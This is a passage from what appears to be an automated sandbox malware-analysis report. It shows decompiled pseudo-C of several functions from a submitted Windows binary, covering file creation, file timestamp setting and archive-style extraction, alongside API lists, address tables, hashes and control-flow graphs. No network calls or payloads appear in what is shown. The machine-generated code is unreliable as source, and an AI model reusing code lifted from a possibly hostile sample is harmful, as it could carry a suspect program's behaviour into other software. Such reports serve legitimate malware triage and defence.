						__eflags = _t24 - 0xffffffff;
						_t19 = _t24 != 0xffffffff;
						__eflags = _t19;
						 *_t50 = _t24;
						_t23 = 0 | _t19;
					}
				} else {
					E00401C80(_t52 - 0x18,  *(_t52 + 8));
					 *((intOrPtr*)(_t52 - 4)) = 0;
					_t26 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t26 + 1);
					_t29 = E00403D04(_t52 - 0x24);
					 *((char*)(_t52 - 4)) = 1;
					_t8 = _t52 + 0x14; // 0x414be4
					_t31 = E0040597A(_t50, _t57,  *_t29,  *(_t52 + 0xc),  *(_t52 + 0x10),  *_t8,  *(_t52 + 0x18));
					E00403A9C( *((intOrPtr*)(_t52 - 0x24)));
					E00403A9C( *((intOrPtr*)(_t52 - 0x18)));
					_t23 = _t31;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t23;
			}











                                          0x004059b8
                                          0x004059c3
                                          0x004059ca
                                          0x004059cc
                                          0x00405a27
                                          0x00405a2c
                                          0x00405a2e
                                          0x00405a34
                                          0x00405a41
                                          0x00405a49
                                          0x00405a4c
                                          0x00405a4c
                                          0x00405a4f
                                          0x00405a51
                                          0x00405a51
                                          0x004059ce
                                          0x004059d4
                                          0x004059d9
                                          0x004059dc
                                          0x004059e4
                                          0x004059ed
                                          0x004059ee
                                          0x004059fa
                                          0x004059fe
                                          0x00405a08
                                          0x00405a12
                                          0x00405a1a
                                          0x00405a20
                                          0x00405a22
                                          0x00405a58
                                          0x00405a60

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004059B8
                                          • AreFileApisANSI.KERNEL32(?,?,00000000,00000003,?,00000000,?,00000000), ref: 004059DC
                                            • Part of subcall function 0040597A: CreateFileA.KERNEL32(?,00000001,?,00000000,?,?,00000000,?,KA,00405A0D,?,?,?,KA,?,00000001), ref: 0040599C
                                          • CreateFileW.KERNELBASE(?,?,?,00000000,KA,?,00000000,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Create$ApisH_prolog
                                          • String ID: KA
                                          • API String ID: 1948390111-4133974868
                                          • Opcode ID: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                                          • Instruction ID: 6ceee1153368ae3910bf8b124445a1a72b78f4c7609cf7ab69cd6f34e54ac91e
                                          • Opcode Fuzzy Hash: f88b55b959810e929b2353b4b1d1eb61229a220c48e216d77a80ee84dd8b33a8
                                          • Instruction Fuzzy Hash: E0118E72A00109EFCF01AFA4D8818DE7F76EF08318F10412AF512B21A1CB398A65DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040483F Relevance: 6.0, APIs: 4, Instructions: 36filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 719 40483f-40484b 720 404859-404876 CreateFileW 719->720 721 40484d-404857 SetLastError 719->721 723 404894-404896 720->723 724 404878-40488e SetFileTime CloseHandle 720->724 722 404897-404899 721->722 723->722 724->723
                                          C-Code - Quality: 100%
                                          			E0040483F(WCHAR* __ecx, FILETIME* __edx, FILETIME* _a4, FILETIME* _a8) {
				void* _t5;
				int _t7;
				signed int _t10;
				FILETIME* _t13;
				void* _t15;
				void* _t17;

				_t10 = 0;
				_t17 =  *0x423148 - _t10; // 0x1
				_t13 = __edx;
				if(_t17 != 0) {
					_t5 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0); // executed
					_t15 = _t5;
					if(_t15 != 0xffffffff) {
						_t7 = SetFileTime(_t15, _t13, _a4, _a8); // executed
						_t10 = 0 | _t7 != 0x00000000;
						CloseHandle(_t15);
					}
					return _t10;
				}
				SetLastError(0x78);
				return 0;
			}









                                          0x00404840
                                          0x00404842
                                          0x00404849
                                          0x0040484b
                                          0x0040486b
                                          0x00404871
                                          0x00404876
                                          0x00404882
                                          0x0040488b
                                          0x0040488e
                                          0x0040488e
                                          0x00000000
                                          0x00404896
                                          0x0040484f
                                          0x00000000

                                          APIs
                                          • SetLastError.KERNEL32(00000078,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040484F
                                          • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?,?), ref: 0040486B
                                          • SetFileTime.KERNELBASE(00000000,00000000,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000), ref: 00404882
                                          • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000,?,0041B370,00000000,00402AAF,00000000,?,?,?), ref: 0040488E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastTime
                                          • String ID:
                                          • API String ID: 2291555494-0
                                          • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                                          • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                                          • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                                          • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408524 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 725 408524-40853c call 413954 728 408546-408579 call 40455d call 402170 725->728 729 40853e-408544 725->729 735 4085c5-4085dd call 4032a8 728->735 736 40857b-40857e 728->736 729->728 742 4085ef-4085f9 735->742 743 4085df-4085ed call 4039df 735->743 738 408582-408586 736->738 740 408590-408594 738->740 741 408588-40858a 738->741 746 408599-40859b 740->746 744 408596 741->744 745 40858c-40858e 741->745 748 4085fb-40860c call 4088ce 742->748 749 40863c-408640 742->749 758 40865e-408664 743->758 744->746 745->738 746->735 750 40859d-4085c4 call 401e19 call 401d7a call 403a9c 746->750 765 40862d-408631 call 4039df 748->765 766 40860e-40862b call 404407 748->766 751 408642-408646 749->751 752 40865c 749->752 750->735 756 408652-408657 call 4042eb 751->756 757 408648-40864d 751->757 752->758 756->752 761 408736-408755 call 4042ad call 403a9c * 2 757->761 763 408733-408735 758->763 764 40866a-40866f 758->764 793 408756-408764 761->793 763->761 769 408671-408678 call 4065b2 764->769 770 408683-4086ad call 40640d 764->770 774 408636-40863a 765->774 766->774 780 40867b-40867d 769->780 787 4086b5-4086b8 770->787 788 4086af-4086b3 770->788 774->748 774->749 780->770 783 408767-408769 780->783 783->761 791 4086d0-4086ea 787->791 792 4086ba-4086c7 787->792 790 408724-40872d 788->790 790->763 790->764 797 40876b-408774 791->797 798 4086ec-408701 791->798 855 4086c8 call 40df69 792->855 856 4086c8 call 40d1ab 792->856 794 4086cb-4086ce 796 408709-40870d 794->796 801 4087a1-4087a4 796->801 802 408713-40871c 796->802 799 408776-408778 797->799 800 40877c-40879f call 4042ad call 403a9c * 2 797->800 798->796 811 408703-408705 798->811 799->800 800->793 805 4087a6-4087af 801->805 806 4087bf-4087de 801->806 802->790 803 40871e-408720 802->803 803->790 809 4087b1-4087b3 805->809 810 4087b7-4087ba 805->810 815 4087e0-4087e8 806->815 816 4087f8-40881b call 405e34 call 40640d 806->816 809->810 810->761 811->796 817 4087ea 815->817 818 4087ef-4087f3 call 401d1b 815->818 826 408879-408886 call 4088ce 816->826 827 40881d-408877 call 401c80 * 2 call 407d82 call 401d7a call 403a9c * 3 816->827 817->818 818->816 832 408888 826->832 833 40888a-4088b5 call 407d82 call 401d7a call 403a9c 826->833 847 4088b6-4088bf 827->847 832->833 833->847 849 4088c1-4088c3 847->849 850 4088c7-4088c9 847->850 849->850 850->761 855->794 856->794
                                          C-Code - Quality: 95%
                                          			E00408524(intOrPtr* __ecx) {
				intOrPtr* _t153;
				signed int _t157;
				intOrPtr _t162;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				signed int _t178;
				signed int _t179;
				signed int _t185;
				void* _t187;
				signed int _t190;
				void* _t196;
				char* _t201;
				signed int _t203;
				signed int _t205;
				intOrPtr _t210;
				signed int _t220;
				signed int _t222;
				void* _t225;
				signed int _t231;
				intOrPtr _t257;
				intOrPtr _t278;
				signed int* _t289;
				signed int _t292;
				intOrPtr _t293;
				intOrPtr _t295;
				void* _t297;

				E00413954(E00419AE4, _t297);
				_t289 = __ecx;
				_t292 = 0;
				_t153 =  *((intOrPtr*)(__ecx));
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t289 + 0x34) = _t292;
				 *( *(_t289 + 0x30)) = _t292;
				E0040455D(_t289 + 4);
				 *(_t297 - 4) = _t292;
				 *(_t297 - 0x20) = _t292;
				 *(_t297 - 0x1c) = _t292;
				 *(_t297 - 0x18) = _t292;
				E00402170(_t297 - 0x20, 3);
				_t157 =  *(_t297 - 0x28);
				 *(_t297 - 4) = 1;
				if(_t157 == _t292) {
					L11:
					E004032A8(_t297 - 0x68, 4);
					 *((intOrPtr*)(_t297 - 0x68)) = 0x41b378;
					__eflags =  *(_t297 + 0xc) - _t292;
					 *(_t297 - 4) = 3;
					if( *(_t297 + 0xc) < _t292) {
						_t231 =  *(_t297 + 8);
						 *(_t297 + 0xc) = _t292;
						__eflags =  *(_t231 + 0x10);
						if( *(_t231 + 0x10) <= 0) {
							L18:
							__eflags =  *(_t297 + 0x10);
							if( *(_t297 + 0x10) != 0) {
								L22:
								_t292 = 0;
								__eflags = 0;
								L23:
								__eflags =  *((intOrPtr*)(_t297 - 0x60)) - _t292;
								 *(_t297 + 0xc) = _t292;
								if( *((intOrPtr*)(_t297 - 0x60)) <= _t292) {
									L37:
									_t293 = 1;
									L38:
									 *(_t297 - 4) = 1;
									E004042AD(_t297 - 0x68);
									E00403A9C( *(_t297 - 0x20));
									E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
									_t162 = _t293;
									L39:
									 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
									return _t162;
								} else {
									goto L24;
								}
								do {
									L24:
									_t163 =  *(_t297 + 0x10);
									__eflags = _t163 - _t292;
									if(_t163 == _t292) {
										L26:
										 *(_t297 + 8) = _t292;
										 *(_t297 - 4) = 4;
										_t165 =  *( *((intOrPtr*)(_t297 - 0x5c)) +  *(_t297 + 0xc) * 4);
										 *(_t289 + 0x1c) = _t165;
										E0040640D(_t297 + 8,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t165 * 4)) + 4))());
										_t169 =  *(_t297 + 8);
										__eflags = _t169 - _t292;
										if(_t169 != _t292) {
											__eflags =  *(_t297 + 0x10) - _t292;
											if( *(_t297 + 0x10) == _t292) {
												 *(_t297 - 0x14) = _t292;
												 *(_t297 - 4) = 5;
												 *((intOrPtr*)( *_t169))(_t169, 0x41b1f8, _t297 - 0x14);
												_t171 =  *(_t297 - 0x14);
												__eflags = _t171 - _t292;
												if(_t171 == _t292) {
													_t172 =  *(_t297 + 8);
													 *(_t297 - 4) = 3;
													__eflags = _t172 - _t292;
													if(_t172 != _t292) {
														 *((intOrPtr*)( *_t172 + 8))(_t172);
													}
													 *(_t297 - 4) = 1;
													E004042AD(_t297 - 0x68);
													E00403A9C( *(_t297 - 0x20));
													E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
													_t162 = 0x80004001;
													goto L39;
												}
												 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t171 + 0xc))(_t171,  *((intOrPtr*)(_t297 + 0x14)));
												_t178 =  *(_t297 - 0x14);
												__eflags = _t178 - _t292;
												 *(_t297 - 4) = 4;
												if(_t178 != _t292) {
													 *((intOrPtr*)( *_t178 + 8))(_t178);
												}
												L33:
												__eflags =  *((intOrPtr*)(_t297 - 0x10)) - 1;
												if( *((intOrPtr*)(_t297 - 0x10)) != 1) {
													__eflags =  *((intOrPtr*)(_t297 - 0x10)) - _t292;
													if( *((intOrPtr*)(_t297 - 0x10)) == _t292) {
														 *(_t297 - 0x54) = _t292;
														 *(_t297 - 0x52) = _t292;
														_t179 =  *(_t297 + 8);
														 *(_t297 - 4) = 6;
														 *((intOrPtr*)( *_t179 + 0x20))(_t179, 0x37, _t297 - 0x54);
														__eflags =  *(_t297 - 0x54) - _t292;
														if( *(_t297 - 0x54) != _t292) {
															__eflags =  *(_t297 - 0x54) - 8;
															_t201 =  *(_t297 - 0x4c);
															if( *(_t297 - 0x54) != 8) {
																_t201 = L"Unknown error";
															}
															E00401D1B(_t289 + 0x30, _t201);
														}
														 *(_t297 - 4) = 4;
														E00405E34(_t297 - 0x54);
														E0040640D(_t289,  *(_t297 + 8));
														_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) +  *(_t289 + 0x1c) * 4));
														__eflags =  *(_t295 + 0x20);
														if( *(_t295 + 0x20) != 0) {
															_t185 = E004088CE(_t295, _t297 - 0x20);
															__eflags = _t185;
															if(_t185 < 0) {
																_t185 = 0;
																__eflags = 0;
															}
															_t257 =  *((intOrPtr*)(_t295 + 0x24));
															_t143 =  *((intOrPtr*)(_t257 + _t185 * 4)) + 0xc; // 0xc
															_push( *((intOrPtr*)(_t257 + _t185 * 4)));
															_t187 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
															 *(_t297 - 4) = 0xa;
															E00401D7A(_t289 + 0x10, _t187);
															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
														} else {
															E00401C80(_t297 - 0x44, 0x423338);
															 *(_t297 - 4) = 7;
															E00401C80(_t297 - 0x38, 0x423338);
															_push(_t297 - 0x44);
															_push(_t297 - 0x38);
															 *(_t297 - 4) = 8;
															_t196 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
															 *(_t297 - 4) = 9;
															E00401D7A(_t289 + 0x10, _t196);
															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
															E00403A9C( *((intOrPtr*)(_t297 - 0x38)));
															E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
														}
														_t190 =  *(_t297 + 8);
														 *(_t297 - 4) = 3;
														__eflags = _t190;
														if(_t190 != 0) {
															 *((intOrPtr*)( *_t190 + 8))(_t190);
														}
														_t293 = 0;
													} else {
														_t203 =  *(_t297 + 8);
														 *(_t297 - 4) = 3;
														__eflags = _t203 - _t292;
														if(_t203 != _t292) {
															 *((intOrPtr*)( *_t203 + 8))(_t203);
														}
														_t293 =  *((intOrPtr*)(_t297 - 0x10));
													}
													goto L38;
												}
												_t205 =  *(_t297 + 8);
												 *(_t297 - 4) = 3;
												__eflags = _t205 - _t292;
												if(_t205 != _t292) {
													 *((intOrPtr*)( *_t205 + 8))(_t205);
												}
												goto L36;
											}
											 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t169 + 0xc))(_t169,  *(_t297 + 0x10), 0x41b5f8,  *((intOrPtr*)(_t297 + 0x18)));
											goto L33;
										}
										 *(_t297 - 4) = 3;
										goto L36;
									}
									_t210 =  *((intOrPtr*)( *_t163 + 0x10))(_t163, _t292, _t292, _t292, _t292);
									__eflags = _t210 - _t292;
									if(_t210 != _t292) {
										_t293 = _t210;
										goto L38;
									}
									goto L26;
									L36:
									 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
									__eflags =  *(_t297 + 0xc) -  *((intOrPtr*)(_t297 - 0x60));
								} while ( *(_t297 + 0xc) <  *((intOrPtr*)(_t297 - 0x60)));
								goto L37;
							}
							__eflags =  *(_t297 + 0xc) - 1;
							if( *(_t297 + 0xc) == 1) {
								E004042EB(_t297 - 0x68, 1);
								goto L22;
							}
							_t293 = 0x80004001;
							goto L38;
						} else {
							goto L14;
						}
						do {
							L14:
							__eflags = E004088CE( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t292 * 4)), _t297 - 0x20);
							if(__eflags < 0) {
								E004039DF(_t297 - 0x68, _t292);
							} else {
								 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
								E00404407(_t297 - 0x68, __eflags,  *(_t297 + 0xc));
								 *(( *(_t297 + 0xc) << 2) +  *((intOrPtr*)(_t297 - 0x5c))) = _t292;
								_t231 =  *(_t297 + 8);
							}
							_t292 = _t292 + 1;
							__eflags = _t292 -  *(_t231 + 0x10);
						} while (_t292 <  *(_t231 + 0x10));
						goto L18;
					}
					E004039DF(_t297 - 0x68,  *(_t297 + 0xc));
					_t231 =  *(_t297 + 8);
					goto L23;
				} else {
					_t278 =  *((intOrPtr*)(_t297 - 0x2c));
					_t220 = _t278 + _t157 * 2 - 2;
					while( *_t220 != 0x2e) {
						if(_t220 == _t278) {
							_t222 = _t220 | 0xffffffff;
							__eflags = _t222;
							L9:
							__eflags = _t222 - _t292;
							if(_t222 >= _t292) {
								__eflags = _t222 + 1;
								_t225 = E00401E19(_t297 - 0x2c, _t297 - 0x44, _t222 + 1);
								 *(_t297 - 4) = 2;
								E00401D7A(_t297 - 0x20, _t225);
								 *(_t297 - 4) = 1;
								E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
							}
							goto L11;
						} else {
							_t220 = _t220;
							continue;
						}
					}
					_t222 = _t220 - _t278 >> 1;
					goto L9;
				}
			}
































                                          0x00408529
                                          0x00408534
                                          0x00408536
                                          0x00408538
                                          0x0040853c
                                          0x00408541
                                          0x00408544
                                          0x00408544
                                          0x00408549
                                          0x00408552
                                          0x00408555
                                          0x0040855f
                                          0x00408562
                                          0x00408565
                                          0x00408568
                                          0x0040856b
                                          0x00408570
                                          0x00408573
                                          0x00408579
                                          0x004085c5
                                          0x004085ca
                                          0x004085cf
                                          0x004085d6
                                          0x004085d9
                                          0x004085dd
                                          0x004085ef
                                          0x004085f2
                                          0x004085f5
                                          0x004085f9
                                          0x0040863c
                                          0x0040863c
                                          0x00408640
                                          0x0040865c
                                          0x0040865c
                                          0x0040865c
                                          0x0040865e
                                          0x0040865e
                                          0x00408661
                                          0x00408664
                                          0x00408733
                                          0x00408735
                                          0x00408736
                                          0x00408739
                                          0x0040873d
                                          0x00408745
                                          0x0040874d
                                          0x00408753
                                          0x00408756
                                          0x0040875c
                                          0x00408764
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040866a
                                          0x0040866a
                                          0x0040866a
                                          0x0040866d
                                          0x0040866f
                                          0x00408683
                                          0x00408683
                                          0x0040868c
                                          0x00408690
                                          0x00408693
                                          0x004086a3
                                          0x004086a8
                                          0x004086ab
                                          0x004086ad
                                          0x004086b5
                                          0x004086b8
                                          0x004086d0
                                          0x004086df
                                          0x004086e3
                                          0x004086e5
                                          0x004086e8
                                          0x004086ea
                                          0x0040876b
                                          0x0040876e
                                          0x00408772
                                          0x00408774
                                          0x00408779
                                          0x00408779
                                          0x0040877f
                                          0x00408783
                                          0x0040878b
                                          0x00408793
                                          0x00408799
                                          0x00000000
                                          0x0040879e
                                          0x004086f5
                                          0x004086f8
                                          0x004086fb
                                          0x004086fd
                                          0x00408701
                                          0x00408706
                                          0x00408706
                                          0x00408709
                                          0x00408709
                                          0x0040870d
                                          0x004087a1
                                          0x004087a4
                                          0x004087bf
                                          0x004087c3
                                          0x004087c7
                                          0x004087d3
                                          0x004087d7
                                          0x004087da
                                          0x004087de
                                          0x004087e0
                                          0x004087e5
                                          0x004087e8
                                          0x004087ea
                                          0x004087ea
                                          0x004087f3
                                          0x004087f3
                                          0x004087fb
                                          0x004087ff
                                          0x00408809
                                          0x00408814
                                          0x00408817
                                          0x0040881b
                                          0x0040887f
                                          0x00408884
                                          0x00408886
                                          0x00408888
                                          0x00408888
                                          0x00408888
                                          0x0040888a
                                          0x00408893
                                          0x00408897
                                          0x0040889b
                                          0x004088a4
                                          0x004088a8
                                          0x004088b0
                                          0x0040881d
                                          0x00408826
                                          0x0040882f
                                          0x00408833
                                          0x0040883e
                                          0x00408842
                                          0x00408846
                                          0x0040884a
                                          0x00408853
                                          0x00408857
                                          0x0040885f
                                          0x00408867
                                          0x0040886f
                                          0x00408874
                                          0x004088b6
                                          0x004088b9
                                          0x004088bd
                                          0x004088bf
                                          0x004088c4
                                          0x004088c4
                                          0x004088c7
                                          0x004087a6
                                          0x004087a6
                                          0x004087a9
                                          0x004087ad
                                          0x004087af
                                          0x004087b4
                                          0x004087b4
                                          0x004087b7
                                          0x004087b7
                                          0x00000000
                                          0x004087a4
                                          0x00408713
                                          0x00408716
                                          0x0040871a
                                          0x0040871c
                                          0x00408721
                                          0x00408721
                                          0x00000000
                                          0x0040871c
                                          0x004086cb
                                          0x00000000
                                          0x004086cb
                                          0x004086af
                                          0x00000000
                                          0x004086af
                                          0x00408678
                                          0x0040867b
                                          0x0040867d
                                          0x00408767
                                          0x00000000
                                          0x00408767
                                          0x00000000
                                          0x00408724
                                          0x00408724
                                          0x0040872a
                                          0x0040872a
                                          0x00000000
                                          0x0040866a
                                          0x00408642
                                          0x00408646
                                          0x00408657
                                          0x00000000
                                          0x00408657
                                          0x00408648
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004085fb
                                          0x004085fb
                                          0x0040860a
                                          0x0040860c
                                          0x00408631
                                          0x0040860e
                                          0x0040861a
                                          0x0040861d
                                          0x00408625
                                          0x00408628
                                          0x00408628
                                          0x00408636
                                          0x00408637
                                          0x00408637
                                          0x00000000
                                          0x004085fb
                                          0x004085e5
                                          0x004085ea
                                          0x00000000
                                          0x0040857b
                                          0x0040857b
                                          0x0040857e
                                          0x00408582
                                          0x0040858a
                                          0x00408596
                                          0x00408596
                                          0x00408599
                                          0x00408599
                                          0x0040859b
                                          0x0040859d
                                          0x004085a6
                                          0x004085af
                                          0x004085b3
                                          0x004085bb
                                          0x004085bf
                                          0x004085c4
                                          0x00000000
                                          0x0040858c
                                          0x0040858d
                                          0x00000000
                                          0x0040858d
                                          0x0040858a
                                          0x00408592
                                          0x00000000
                                          0x00408592

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 83B$Unknown error
                                          • API String ID: 3519838083-1944086607
                                          • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                                          • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                                          • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                                          • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408F0A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 206COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 79%
                                          			E00408F0A(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
				intOrPtr* _t131;
				void* _t137;
				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				E00413954(E00419BC6, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = E00403A76();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00409184(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00402170(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00402170(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00402170(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					_push(_t199 + 0x1c);
					if(E00404E76( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c) != 0) {
						_t137 = E00401E3A(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401D7A(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = E00401E19(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401D7A(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E004092E9(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_t62 = _t199 + 0x14; // 0x414be4
						_push( *_t62);
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00408A3B(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = E00402634(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							E00403998(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(E00402634(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									E00403998(_t193);
									 *(_t199 - 4) = 4;
